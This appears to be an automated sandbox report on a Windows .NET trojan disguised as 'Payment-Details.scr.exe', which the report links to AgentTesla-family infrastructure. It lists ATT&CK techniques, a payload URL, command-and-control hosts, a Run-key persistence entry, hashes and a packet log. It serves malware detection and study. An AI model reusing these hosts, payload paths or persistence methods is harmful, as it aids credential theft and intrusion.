                    | Credentials | Domains | Default Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 211 Process Injection | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 34 System Information Discovery | Remote Desktop Protocol | 2 Data from Local System | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
                    | Email Addresses | DNS Server | Domain Accounts | At | 1 Registry Run Keys / Startup Folder | 1 Scheduled Task/Job | 2 Obfuscated Files or Information | 1 Credentials in Registry | 1 Query Registry | SMB/Windows Admin Shares | 1 Email Collection | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact |
                    | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 Registry Run Keys / Startup Folder | 2 Software Packing | NTDS | 531 Security Software Discovery | Distributed Component Object Model | 21 Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
                    | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Process Discovery | SSH | Keylogging | 13 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
                    | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 11 Masquerading | Cached Domain Credentials | 261 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
                    | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 261 Virtualization/Sandbox Evasion | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
                    | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 211 Process Injection | Proc Filesystem | 1 System Network Configuration Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
[Figure: Behavior Graph. ID: 1495997; Sample: Payment-Details.scr.exe; Start date: 20/08/2024; Architecture: WINDOWS; Score: 100]

Source | Detection | Scanner | Label | Link
Payment-Details.scr.exe | 18% | ReversingLabs
Payment-Details.scr.exe | 100% | Joe Sandbox ML

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Roaming\Fdimzk.exe | 100% | Joe Sandbox ML
C:\Users\user\AppData\Roaming\Fdimzk.exe | 18% | ReversingLabs

No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label | Link
https://sectigo.com/CPS0 | 0% | URL Reputation | safe
https://stackoverflow.com/q/14436606/23354 | 0% | URL Reputation | safe
https://account.dyn.com/ | 0% | URL Reputation | safe
http://x1.c.lencr.org/0 | 0% | URL Reputation | safe
http://x1.i.lencr.org/0 | 0% | URL Reputation | safe
https://stackoverflow.com/q/11564914/23354; | 0% | URL Reputation | safe
https://stackoverflow.com/q/2152978/23354 | 0% | URL Reputation | safe
http://ip-api.com | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
http://ip-api.com/line/?fields=hosting | 0% | URL Reputation | safe
https://etehadshipping.com/chmod | 0% | Avira URL Cloud | safe
http://nffplp.com | 0% | Avira URL Cloud | safe
https://github.com/mgravell/protobuf-neti | 0% | Avira URL Cloud | safe
https://etehadshipping.com/chmod%20permission%20777/panel/Uslmwziyya.vdf | 0% | Avira URL Cloud | safe
https://github.com/mgravell/protobuf-netJ | 0% | Avira URL Cloud | safe
http://r11.o.lencr.org0# | 0% | Avira URL Cloud | safe
http://ip-api.com/line/?fields=hostingD9;k | 0% | Avira URL Cloud | safe
http://ip-api.com/line/?fields=hostingc9 | 0% | Avira URL Cloud | safe
https://etehadshipping.com | 0% | Avira URL Cloud | safe
http://r11.i.lencr.org/03 | 0% | Avira URL Cloud | safe
https://github.com/mgravell/protobuf-net | 0% | Avira URL Cloud | safe
http://ip-api.com/line/?fields=hosting- | 0% | Avira URL Cloud | safe
http://ip-api.com/line/?fields=hosting% | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ip-api.com | 208.95.112.1 | true | true | | unknown
nffplp.com | 163.44.198.71 | true | true | | unknown
etehadshipping.com | 5.144.130.41 | true | false | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://etehadshipping.com/chmod%20permission%20777/panel/Uslmwziyya.vdf | false | Avira URL Cloud: safe | unknown
http://ip-api.com/line/?fields=hosting | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
5.144.130.41 | etehadshipping.com | Iran (ISLAMIC Republic Of) | 59441 | HOSTIRAN-NETWORKIR | false
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | true
163.44.198.71 | nffplp.com | Singapore | 135161 | GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSG | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1495997
Start date and time: 2024-08-20 18:38:16 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 10s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Payment-Details.scr.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@9/2@3/3
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 95%
                          • Number of executed functions: 528
                          • Number of non-executed functions: 26
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Not all processes were analyzed, report is missing behavior information
                          • Report creation exceeded maximum time and may have missing disassembly code information.
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size exceeded maximum capacity and may have missing disassembly code.
                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • VT rate limit hit for: Payment-Details.scr.exe
Time | Type | Description
12:39:13 | API Interceptor | 105x Sleep call for process: Payment-Details.scr.exe modified
12:39:39 | API Interceptor | 26039x Sleep call for process: InstallUtil.exe modified
12:39:47 | API Interceptor | 295x Sleep call for process: Fdimzk.exe modified
18:39:38 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Fdimzk C:\Users\user\AppData\Roaming\Fdimzk.exe
18:39:47 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Fdimzk C:\Users\user\AppData\Roaming\Fdimzk.exe
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          208.95.112.1ExeFile (275).exeGet hashmaliciousQuasarBrowse
                          • ip-api.com/json/
                          ExeFile (351).exeGet hashmaliciousQuasarBrowse
                          • ip-api.com/json/
                          ExeFile (206).exeGet hashmaliciousRMSRemoteAdmin, XmrigBrowse
                          • ip-api.com/json
                          DHL-SOA_88417.batGet hashmaliciousAgentTeslaBrowse
                          • ip-api.com/line/?fields=hosting
                          PO 28014399.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                          • ip-api.com/line/?fields=hosting
                          documentos43.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                          • ip-api.com/line/?fields=hosting
                          PI-0008102024002REMAP.exeGet hashmaliciousAgentTeslaBrowse
                          • ip-api.com/line/?fields=hosting
                          INV N.exeGet hashmaliciousAgentTeslaBrowse
                          • ip-api.com/line/?fields=hosting
                          PAGO SWIFT INV NUMB43568B30000097 PDF.exeGet hashmaliciousAgentTeslaBrowse
                          • ip-api.com/line/?fields=hosting
                          lPq4mW9QT0.exeGet hashmaliciousGo InjectorBrowse
                          • ip-api.com/json/?fields=status,message,query,country,regionName,city,isp,timezone
                          163.44.198.71Outward Remittance_Payment Receipt.exeGet hashmaliciousAgentTeslaBrowse
                            SOA Payment for June 30th.exeGet hashmaliciousAgentTeslaBrowse
                              US00061Q0904081THBKK.exeGet hashmaliciousAgentTeslaBrowse
                                SecuriteInfo.com.Win32.PWSX-gen.17036.7156.exeGet hashmaliciousAgentTeslaBrowse
                                  SecuriteInfo.com.Win32.PWSX-gen.25669.202.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                    Commercial_Inv_and_PList.exeGet hashmaliciousAgentTeslaBrowse
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      nffplp.comOutward Remittance_Payment Receipt.exeGet hashmaliciousAgentTeslaBrowse
                                      • 163.44.198.71
                                      SOA Payment for June 30th.exeGet hashmaliciousAgentTeslaBrowse
                                      • 163.44.198.71
                                      US00061Q0904081THBKK.exeGet hashmaliciousAgentTeslaBrowse
                                      • 163.44.198.71
                                      SecuriteInfo.com.Win32.PWSX-gen.17036.7156.exeGet hashmaliciousAgentTeslaBrowse
                                      • 163.44.198.71
                                      SecuriteInfo.com.Win32.PWSX-gen.25669.202.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 163.44.198.71
                                      Commercial_Inv_and_PList.exeGet hashmaliciousAgentTeslaBrowse
                                      • 163.44.198.71
                                      ip-api.comExeFile (275).exeGet hashmaliciousQuasarBrowse
                                      • 208.95.112.1
                                      ExeFile (351).exeGet hashmaliciousQuasarBrowse
                                      • 208.95.112.1
                                      ExeFile (206).exeGet hashmaliciousRMSRemoteAdmin, XmrigBrowse
                                      • 208.95.112.1
                                      ExeFile (10).exeGet hashmaliciousCryptbotBrowse
                                      • 208.95.112.1
                                      DHL-SOA_88417.batGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      PO 28014399.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      documentos43.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      PI-0008102024002REMAP.exeGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      INV N.exeGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      PAGO SWIFT INV NUMB43568B30000097 PDF.exeGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      HOSTIRAN-NETWORKIRrDHL_PT563857935689275783656385FV-GDS3535353.batGet hashmaliciousFormBook, GuLoaderBrowse
                                      • 185.83.114.124
                                      rFV-452747284IN.batGet hashmaliciousFormBook, GuLoaderBrowse
                                      • 185.83.114.124
                                      Shipping Docs.rdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 5.144.130.49
                                      PAYMENT LIST.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 5.144.130.49
                                      PO# CV-PO23002552.PDF.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 5.144.130.49
                                      PO# CV-PO23002552.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 5.144.130.35
                                      Overdue Account.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • 5.144.130.35
                                      https://hamrahansystem.com/4xe3cx/?PliaTEYmfRshGet hashmaliciousUnknownBrowse
                                      • 45.138.134.33
                                      Saham_Man.apkGet hashmaliciousIRATABrowse
                                      • 5.144.130.58
                                      Invoice-AWB-Document.doc.exeGet hashmaliciousAgentTeslaBrowse
                                      • 5.144.130.32
                                      GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSGQoute_EXW_prices_43GJI_pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                      • 118.27.130.234
                                      Qoute_EXW_prices_43GJI_pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                      • 118.27.130.234
                                      https://cpanel12wh.bkk1.cloud.z.com/~cp318430/app/browser/info/billing2.php/Get hashmaliciousUnknownBrowse
                                      • 163.44.198.61
                                      https://dub.sh/nL4qBGQGet hashmaliciousUnknownBrowse
                                      • 150.95.31.161
                                      Outward Remittance_Payment Receipt.exeGet hashmaliciousAgentTeslaBrowse
                                      • 163.44.198.71
                                      http://coffeeroasting.co.th/Get hashmaliciousUnknownBrowse
                                      • 163.44.198.45
                                      SOA Payment for June 30th.exeGet hashmaliciousAgentTeslaBrowse
                                      • 163.44.198.71
                                      US00061Q0904081THBKK.exeGet hashmaliciousAgentTeslaBrowse
                                      • 163.44.198.71
                                      http://46814880-10-20181030130048.webstarterz.com/tedsplay.com/onlinebankingmtb/securityauthentication.html?onlinebanking.mtb.com/Login/MTBSignOn?security+authenticationGet hashmaliciousUnknownBrowse
                                      • 163.44.198.51
                                      http://46814880-10-20181030130048.webstarterz.com/tedsplay.com/onlinebankingmtb/secq.html?onlinebanking.mtb.com/Login/MTBSignOnGet hashmaliciousUnknownBrowse
                                      • 163.44.198.51
                                      TUT-ASUSExeFile (275).exeGet hashmaliciousQuasarBrowse
                                      • 208.95.112.1
                                      ExeFile (351).exeGet hashmaliciousQuasarBrowse
                                      • 208.95.112.1
                                      ExeFile (206).exeGet hashmaliciousRMSRemoteAdmin, XmrigBrowse
                                      • 208.95.112.1
                                      DHL-SOA_88417.batGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      PO 28014399.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      documentos43.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      PI-0008102024002REMAP.exeGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      INV N.exeGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      PAGO SWIFT INV NUMB43568B30000097 PDF.exeGet hashmaliciousAgentTeslaBrowse
                                      • 208.95.112.1
                                      lPq4mW9QT0.exeGet hashmaliciousGo InjectorBrowse
                                      • 208.95.112.1
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | ExeFile (279).exe | malicious | BlackMoon Banker | 5.144.130.41
| https://teamsportalmst365.ubpages.com/teams-2051/ | malicious | Unknown | 5.144.130.41
| SecuriteInfo.com.Win32.MalwareX-gen.15358.5163.exe | malicious | StormKitty, SugarDump, XWorm | 5.144.130.41
| SecuriteInfo.com.Win32.MalwareX-gen.13009.27381.exe | malicious | XWorm | 5.144.130.41
| S0fJap0SX1.lnk | malicious | Unknown | 5.144.130.41
| https://esrour.geoffice.cloud/ | malicious | HTMLPhisher | 5.144.130.41
| nf075-4d-qns0-w383.msi | malicious | Unknown | 5.144.130.41
| https://aka.ms/LearnAboutSenderIdentification | malicious | Unknown | 5.144.130.41
| ExeFile (95).exe | malicious | Unknown | 5.144.130.41
| ExeFile (97).exe | malicious | Unknown | 5.144.130.41
                                      No context
                                      Process:C:\Users\user\Desktop\Payment-Details.scr.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):132608
                                      Entropy (8bit):5.735613874831862
                                      Encrypted:false
                                      SSDEEP:3072:1aEYLUfh5+u/Ua2HBrvyIBfn8+ux221Hll:1acfh5+CpK+
                                      MD5:EEE76D74368111C385E634A9F4F5A9CF
                                      SHA1:35A9AFB88F649E243A1BE654EF7AAD6E5DAFBCE5
                                      SHA-256:82EE5C8372F9BC8AC9CFAC2833C19D238FA8A60FA32E6D27D9FC781D2E64DC25
                                      SHA-512:C0ABB244EBBB840260D0295B1181B02914E68F309509933E07A5048816B0A19D2F11336537C4EACC5A470B3F702F22BD92620CF7AD836E5AE0657EEF1015F41F
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 18%
                                      Reputation:low
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....f.............................+... ...@....@.. .......................`............`..................................+..S....@.......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......@......................@..B.................+......H........!...............................................................(....*.s....r...p(....o....o....o....o....*..(....*.0..I.......(....(....o.......8+............r...p .......o....&.....&.......X....i2.*............8.......0.......... ..........8.....(..........&.......i .......*...................0..........(....s......s......o.....o....Z...........88......8 ........o........%.X...(........X.....o....2....X.....o....2..........9.....o......9.....o.......*..........gy..
                                      Process:C:\Users\user\Desktop\Payment-Details.scr.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:modified
                                      Size (bytes):26
                                      Entropy (8bit):3.95006375643621
                                      Encrypted:false
                                      SSDEEP:3:ggPYV:rPYV
                                      MD5:187F488E27DB4AF347237FE461A079AD
                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                      Malicious:true
                                      Reputation:high, very likely benign file
                                      Preview:[ZoneTransfer]....ZoneId=0
                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Entropy (8bit):5.735613874831862
                                      TrID:
                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                      • DOS Executable Generic (2002/1) 0.01%
                                      File name:Payment-Details.scr.exe
                                      File size:132'608 bytes
                                      MD5:eee76d74368111c385e634a9f4f5a9cf
                                      SHA1:35a9afb88f649e243a1be654ef7aad6e5dafbce5
                                      SHA256:82ee5c8372f9bc8ac9cfac2833c19d238fa8a60fa32e6d27d9fc781d2e64dc25
                                      SHA512:c0abb244ebbb840260d0295b1181b02914e68f309509933e07a5048816b0a19d2f11336537c4eacc5a470b3f702f22bd92620cf7ad836e5ae0657eef1015f41f
                                      SSDEEP:3072:1aEYLUfh5+u/Ua2HBrvyIBfn8+ux221Hll:1acfh5+CpK+
                                      TLSH:C5D38191E3587CB6E81A13B68D768B11261BFE688AB6471F241EB1255DB335334F3C0B
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.............................+... ...@....@.. .......................`............`................................
                                      Icon Hash:3c58898989a5999b
                                      Entrypoint:0x402bfe
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x66C494E8 [Tue Aug 20 13:06:48 2024 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                      Instruction
                                      jmp dword ptr [00402000h]
                                      add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2ba8 | 0x53 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4000 | 0x1f20e | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x24000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xc04 | 0xe00 | e9ffce180b335184e57782ba138066da | False | 0.5200892857142857 | data | 4.869446235593652 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x4000 | 0x1f20e | 0x1f400 | 6aedfef7a2fbe9b03f414e11eee10c22 | False | 0.36746875 | data | 5.741550330836554 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x24000 | 0xc | 0x200 | 1ec5690d2ab1631d2d5d2bb14cdaf54e | False | 0.041015625 | data | 0.06116285224115448 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x4220 | 0x6583 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9947666140762689
RT_ICON | 0xa7a4 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2835 x 2835 px/m | | | 0.16020939311487045
RT_ICON | 0x1afcc | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 2835 x 2835 px/m | | | 0.264407179971658
RT_ICON | 0x1f1f4 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2835 x 2835 px/m | | | 0.32427385892116184
RT_ICON | 0x2179c | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2835 x 2835 px/m | | | 0.41322701688555347
RT_ICON | 0x22844 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2835 x 2835 px/m | | | 0.5771276595744681
RT_GROUP_ICON | 0x22cac | 0x5a | data | | | 0.7666666666666667
RT_VERSION | 0x22d08 | 0x31c | data | | | 0.4321608040201005
RT_MANIFEST | 0x23024 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                      Aug 20, 2024 18:39:25.788511038 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.788520098 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.788553953 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.799994946 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.800010920 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.800079107 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.800090075 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.800122023 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.808245897 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.808264971 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.808322906 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.808331966 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.808379889 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.817231894 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.817253113 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.817312956 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.817322016 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.817357063 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.838799953 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.838820934 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.838891983 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.838903904 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.838937998 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.844079971 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.844099045 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.844161034 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.844171047 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.844203949 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.862307072 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.862335920 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.862404108 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.862433910 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.862476110 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.865338087 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.865358114 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.865415096 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.865423918 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.865463972 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.874438047 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.874474049 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.874516010 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.874537945 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.874551058 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.874569893 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.884150028 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.884180069 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.884239912 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.884259939 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.884299040 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.894983053 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.895010948 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.895075083 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.895088911 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.895148039 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.905097008 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.905119896 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.905180931 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.905200958 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.905237913 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.912770033 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.912789106 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.912854910 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.912870884 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.912913084 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.934565067 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.934583902 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.934669018 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.934679031 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.934719086 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.945722103 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.945739985 CEST443497045.144.130.41192.168.2.8
                                      Aug 20, 2024 18:39:25.945892096 CEST49704443192.168.2.85.144.130.41
                                      Aug 20, 2024 18:39:25.945903063 CEST443497045.144.130.41192.168.2.8
